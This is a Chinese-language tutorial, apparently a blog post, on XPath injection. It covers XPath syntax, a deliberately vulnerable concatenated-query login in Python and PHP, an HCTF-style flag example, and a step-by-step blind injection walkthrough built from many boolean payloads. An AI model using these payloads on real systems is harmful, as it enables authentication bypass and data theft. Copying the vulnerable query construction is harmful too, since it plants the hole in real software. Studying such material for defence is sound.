浅谈Xpath注入漏洞
创始人
2024-05-31 21:29:44
0

目录

知识简介

攻击简介

基础语法

语法演示

漏洞简介

漏洞原理

漏洞复现

Xpath盲注


知识简介

攻击简介

XPath注入攻击是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入发生在当站点使用用户输入的信息来构造请求以获取XML数据。攻击者对站点发送经过特殊构造的信息来探究站点使用的XML是如何构造的,从而进一步获取正常途径下无法获取的数据。当XML数据被用作账户验证时,攻击者还可以提升他的权限。

基础语法

“nodename” – 选取nodename的所有子节点
“/nodename” – 从根节点中选择
“//nodename” – 从当前节点选择
“..” – 选择当前节点的父节点
“child::node()” – 选择当前节点的所有子节点
"@" -选择属性
"//user[position()=2] " 选择节点位置

语法演示

from lxml import etree
xml ='''18male李四24female
'''
tree = etree.XML(xml)
out = tree.xpath('//students')[0][0][0][0].text
print(out)
print('-------------------------------------')
out = tree.xpath('//name')[1].text
print(out)
out = tree.xpath('//name')[1].xpath('@id')
print(out)


-------------------------------------
李四
['ls']

漏洞简介

漏洞原理

XPath 注入的原理与sql注入大体类似。主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作为参数传入Web 应用程序,通过执行XPath查询而执行入侵者想要的操作。但是,注入的对象不是数据库users表了,而是一个存储数据的XML文件。因为xpath不存在访问控制,所以我们不会遇到许多在SQL注入中经常遇到的访问限制。 注入出现的位置也就是cookieheadersrequest parameters/input

漏洞复现

  • 案例1
  • 正常网站存在如下登录代码
from lxml import etreexml ='''admin123456

'''
tree = etree.XML(xml)
username = input('请输入用户名')
password = input('请输入密码')
out = tree.xpath('/students/student[id/text()="'+username+'" and password/text()="'+password+'"]')
print('登录成功,欢迎您'+out[0][0].text)

正常登陆

不正常登录

" or "1"="1
/students/student[id/text()="admin" and password/text() = "" or "1"="1"]

  • 案例2

index.php

xpath($query);
foreach($ans as $x => $x_value)
{
echo $x.":  " . $x_value;
echo "
"; } } ?>

coleak.xml




user1
KEY:1
user2
KEY:2
user3
KEY:3
user4
KEY:4
user5
KEY:5
user6
KEY:6
user7
KEY:7
user8
KEY:8
user9
KEY:9


hctf
flag:hctf{Dd0g_fac3_t0_k3yboard233}

正常查询

测试 ?user='" 时出现报错,可以确定存在Xpath注入

-1' or 1=1 or ''='
$query="user/username[@name='-1' or 1=1 or ''='']";
1=1为真 ''='' 为真,则可以匹配当前节点下的所有user

']|//*|//*['
$query="user/username[@name='']|//*|//*['';
这里闭合了$user前后的单引号同时执行三个操作,其中第二个操作//*即是关键点,列出文档中的所有元素,最后拿到flag

Xpath盲注

xpath盲注适用于攻击者不清楚XML文档的架构,没有错误信息返回,一次只能通过布尔化查询来获取部分信息,同样以0x05中的源码为例

Xpath盲注步骤:

  • 判断根节点下的节点数
  • 判断根节点下节点长度&名称
  • .....
  • 重复猜解完所有节点,获取最后的值

从根节点开始判断

'or count(/)=1  or ''='     ###根节点数量为1
'or count(/*)=1 or ''='   ##根节点下只有一个子节点

判断根节点下的节点长度

'or string-length(name(/*[1]))=8 or ''='

猜解根节点下的节点名称

'or substring(name(/*[1]), 1, 1)='a'  or ''='
'or substring(name(/*[1]), 2, 1)='c'  or ''='
..
'or substring(name(/*[1]), 8, 1)='s'  or ''='

猜解出该节点名称为accounts

'or count(/accounts)=1  or ''='   /accounts节点数量为1
'or count(/accounts/user/*)>0 or ''='     /accounts下有两个节点
'or string-length(name(/accounts/*[1]))=4  or ''='    第一个子节点长度为4

猜解accounts下的节点名称

'or substring(name(/accounts/*[1]), 1, 1)='u'  or ''='
...
'or substring(name(/accounts/*[1]), 4, 1)='r'  or ''='

accounts下子节点名称为user

'or count(/accounts/user)=2  or ''='    user节点有两个,则可以猜测出accounts节点结构,accounts下两个节点,均为user节点

第一个user节点的子节点长度为8:
'or string-length(name(/accounts/user[position()=1]/*[1]))=8 or ''='

读取user节点的下子节点

'or substring(name(/accounts/user[position()=1]/*[1]), 1, 1)='u'  or ''='
'or substring(name(/accounts/user[position()=1]/*[1]), 2, 1)='s'  or ''='
...
'or substring(name(/accounts/user[position()=1]/*[1]), 8, 1)='e'  or ''='

最终所有子节点值验证如下:

'or substring(name(/accounts/user[position()=1]/*[1]), 1)='username'  or ''='
'or substring(name(/accounts/user[position()=1]/*[2]), 1)='email'  or ''='
'or substring(name(/accounts/user[position()=1]/*[3]), 1)='accounttype'  or ''='
'or substring(name(/accounts/user[position()=1]/*[4]), 1)='password'  or ''='

继续猜解:

'or count(/accounts/user[position()=1]/username/*)>0 or ''='   
'or count(/accounts/user[position()=1]/email/*)>0 or ''=' 
'or count(/accounts/user[position()=1]/accounttype/*)>0 or ''='
'or count(/accounts/user[position()=1]/username/password/*)>0 or ''='

均为 false,不再有子节点,则可以尝试读取这些节点的值

第一个user下的username值长度为6:

'or string-length((//user[position()=1]/username[position()=1]))=6  or ''='

读取第一个user下usernaem的值

'or substring((//user[position()=1]/username[position()=1]),1,1)='T'  or ''='
....
'or substring((//user[position()=1]/username[position()=1]),6,1)='e'  or ''='

可依次读取所有的子节点的值,第二user节点的子节点值读取方式:

'or string-length((//user[position()=2]/username[position()=1]))=4 or ''='  第一个user下的username长度为4
......

重复上边步骤即可

相关内容

热门资讯

23.99万起,搭载华为乾崑,... 2025年4月23日,深蓝汽车旗下全新中大型豪华SUV——深蓝S09预售发布会在上海车展期间正式启幕...
小屏党再也不必妥协!一加13T... 一、前言:单手的神!击穿性能、续航痛点这些年用户苦大屏机已久,厂商们不断堆料虽然配置诚意十足,但逐渐...
事关“收款码”!宁波多地发布预... 最近一段时间我市多地反诈中心接连发布紧急预警提醒市民注意“代转账(付款)”陷阱切莫成了电诈“工具人”...
演员孙俪:中年人没有脆弱的时间... 在电视剧行业,“孙俪”两个字,几乎是品质的代名词。她所塑造的角色,总能在观众心中留下深刻印记。从《甄...
破解科技成果和中小企业需求信息... 每经记者 张蕊    每经编辑 张益铭 “我们希望借助科研院校的力量,提升我们的技...
光大证券:稳就业放在“四稳”之... 格隆汇4月26日|光大证券首席经济学家高瑞东发布4月25日政治局会议精神学习体会。高瑞东认为,短期政...
北京博睿宏远数据科技股份有限公... 公司代码:688229 公司简称:博睿数据北京博睿宏远数据科技股份有限公司2024年年度报告摘要第一...
今日启用!青岛都市圈再添一高标... 青岛都市圈铁路建设项目迎来新进展今日(4月26日)上午9时11分随着G4865次列车驶出日照站客运设...
山东国瓷功能材料股份有限公司2... 证券代码:300285 证券简称:国瓷材料 公告编号:2025-021山东国瓷功能材料股份有限公司...
重点发力中国中央空调市场 P... 转自:新华财经新华财经上海4月26日电(记者 杨有宗)26日,记者从PROFROID全球品牌发布会获...
反复炒作无人机作战 台军有何图... 本文转自【看台海】;近日,台军盛行着一股所谓“无人机制胜论”。民进党当局除了加紧扩充无人机装备外,更...
恒烁半导体(合肥)股份有限公司... 公司代码:688416 公司简称:恒烁股份恒烁半导体(合肥)股份有限公司2024年年度报告摘要第一节...
走马观花的意思是什么 走马观花的意思是什么走马观花,指骑在奔跑的马上看花。原形容事情如意,心境愉快。后多指粗略地观察一下。...
天价离婚!女方分走超3亿 4月25日晚间,鼎信通讯(维权)(SH603421,股价6.09元,市值39.72亿元)发布公告称,...
每斤售价超百元!青岛这种大樱桃... 4月25日,记者在胶州市洋河镇樱之语大樱桃园内看到,露天樱桃花正烂漫绽放,而智能温室大棚内,颗颗红亮...
读者出版传媒股份有限公司202... 公司代码:603999 公司简称:读者传媒本公司董事会及全体董事保证本公告内容不存在任何虚假记载、误...
伊朗南部阿巴斯港港口发生爆炸 总台记者获悉,当地时间26日,伊朗南部阿巴斯港港口发生爆炸。目前爆炸原因不明。(总台记者 李健南)©...
烽火通信科技股份有限公司 (上接1007版)证券代码:600498 证券简称:烽火通信 公告编号:2025-023转债代码:...
开源证券给予江苏金租买入评级,... 开源证券04月26日发布研报称,给予江苏金租(600901.SH,最新价:5.21元)买入评级。评级...
第三品牌杀入A0级纯电赛道 李... 本报记者 方超 石英婧 上海报道在新能源渗透率持续提升大背景下,A0级纯电小车市场正成为巨头竞逐的新...